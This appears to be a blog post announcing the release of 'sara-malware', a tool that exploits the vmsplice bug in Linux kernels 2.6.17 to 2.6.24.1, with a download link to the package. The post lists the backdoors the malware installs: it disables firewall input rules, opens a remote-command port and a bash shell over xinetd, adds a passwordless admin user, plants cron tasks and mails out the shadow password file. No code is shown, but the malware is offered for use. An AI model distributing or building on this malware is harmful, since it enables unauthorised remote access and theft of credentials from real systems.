Hi all!
I released today a basic malware for to exploit the vmsplice bug on Linux kernel.
This program use the vulnerability for install some backdoors on system.
UPDATED
Actions:
- disable INPUT rules on firewall
- open the 1407 port for execute remote commands
- open a bash session on 14071 port using the xinetd daemon
- add a admin user without password
- schedule malicious tasks on cron
- mail the shadow file for a mail account
Vulnerables systems: Linux 2.6.17 - 2.6.24.1
Warning:
THIS IS A MALWARE. DON'T RUN IT IF YOU DON'T KNOW
WHAT YOU ARE DOING.
Download:
http://coarseknocking.sourceforge.net/sara/sara-malware-0.0.2.tar.gz
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment